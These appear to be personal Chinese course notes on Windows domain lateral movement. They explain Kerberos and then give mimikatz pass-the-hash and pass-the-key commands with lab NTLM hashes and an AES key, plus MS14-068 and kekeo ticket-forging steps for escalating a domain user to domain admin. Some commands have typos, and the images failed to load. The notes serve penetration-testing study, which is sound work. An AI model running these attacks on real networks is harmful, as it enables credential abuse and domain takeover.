内网渗透-PTHPTTPTK

内网渗透-PTH&PTT&PTK

！–看小迪老师课程自己做的笔记

！–之前gitee图床出问题了，部分图片实在找不到了，想深入研究可以去看小迪老师课程

一、kerberos协议具体工作方法

1、客户机将明文密码进行NTLM哈希，然后和时间戳一起加密（使用krbtgt密码hash作为秘钥），发送给kdc（域控），kdc对用户进行检测，成功之后创建TGT

2、将TGT进行加密签名返回给客户机，只有域用户（krbtgt）才能读取kerberos中的TGT数据

3、客户机将TGT发送给域控制器KDC请求TGS（票证授权服务）票证，并且对TGT进行检测

4、检测成功后，将目标服务账户的NTLM以及TGT进行加密，将加密后的结果返回给客户机。

PTH：利用lM或者NTLM的值进行的渗透测试

PTT：利用票据凭证TGT进行的渗透测试

PTK：利用ekeys aes256进行的渗透测试

总结：KB2871997的影响

PTH：没打补丁前任意用户都可以连接，打了补丁只能使用administrator连接

PTK：打了补丁才能任意用户连接，采用aes256连接

PTT：ptt攻击不是简单的NTLM认证了，他是利用kerberos协议进行攻击。MS14-068攻击，允许域内任何一个普通用户，将自己的权限提升至域管理员权限。

二、使用PTH域横向移动---->Mimikatz (未打补丁KB2871997)

注意：当禁用了NTLM认证，psexec、smbexec等无法利用NTLM hash远程连接，但是使用mimikatz依然可以攻击成功。

PTH-ntlm传递（未打补丁KB2871997）

域管理员连接

sekurlsa::pth /user:administrator /domain:ghy /ntlm:d4a1605da045ea9ea9873e349dabbbfe#弹出的cmd窗口执行dir \\计算机名\c$

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-FB7rMpTW-1666783160176)(/gaohongyu1/csdn/raw/master/image-0706193041187.png)]

域普通用户连接

sekurlsa::pth /user:websec /domain:ghy /ntlm:0778dc8266297ac5062bfa47156499c9#弹出的窗口执行dir \\\c$

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-IXKXtbmP-1666783160176)(/gaohongyu1/csdn/raw/master/image-0706195918045.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-dq6to8Xh-1666783160177)(/gaohongyu1/csdn/raw/master/image-0706195937233.png)]

工作组连接

sekurlsa::pth /user:administrator /domain:WORKGROUP /ntlm:0778dc8266297ac5062bfa47156499c9#弹出窗口执行dir \\192.168.139.131\c$dir \\\c$

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3MntCZ7Q-1666783160178)(/gaohongyu1/csdn/raw/master/image-070623112.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-cJJuN62H-1666783160178)(/gaohongyu1/csdn/raw/master/image-070643281.png)]

三、使用PTK域横向移动---->Mimikatz（打补丁KB2871997）

pth ntlm administrator传递

sekurlsa::pth /user:administrator /domain:ghy /ntlm：d4a1605da045ea9ea9873e349dabbbfe

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-yddOSHd6-1666783160180)(/gaohongyu1/csdn/raw/master/image-0706204208356.png)]

ptk aes256 传递

#aes256 获取sekurlsa::ekeyssekurlsa::pth /user:websec /domain:ghy /aes256:d61a2e608802a77332b4d98923052b0182e2592e28039d756dc402a12f09a8a9

ptt 票证传递

kist 查看票证kist /purge 清除票证

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-pMqK5PKP-1666783160180)(/gaohongyu1/csdn/raw/master/image-0708194802306.png)]

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-fHO59tcI-1666783160181)(/gaohongyu1/csdn/raw/master/image-0708194927815.png)]

whoami /user 查看用户sid

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-SBCI8Wkf-1666783160181)(/gaohongyu1/csdn/raw/master/image-0708195020452.png)]

1、利用MS14-068漏洞，实现普通用户直接获取域控system权限

mimikatz # kerberos::purge 清除当前机器中的凭证mimikatz # ketberos::list查看当前机器凭证ms14-068.exe -u websec@ -s S-1-5-21-3451611406-1810481340-3913844723-1105 -d 192.168.139.131 -p ghy.00925 生成TGT数据mimikatz # kerberos::ptc 票据文件 将票据注入内存中

2、利用kekeo

kekeo "tgt::ask" /user:websec /domain: /ntlm:0778dc8266297ac5062bfa47156499c9生成票据kerberos::ptt 票据文件@.kirbi 导入数据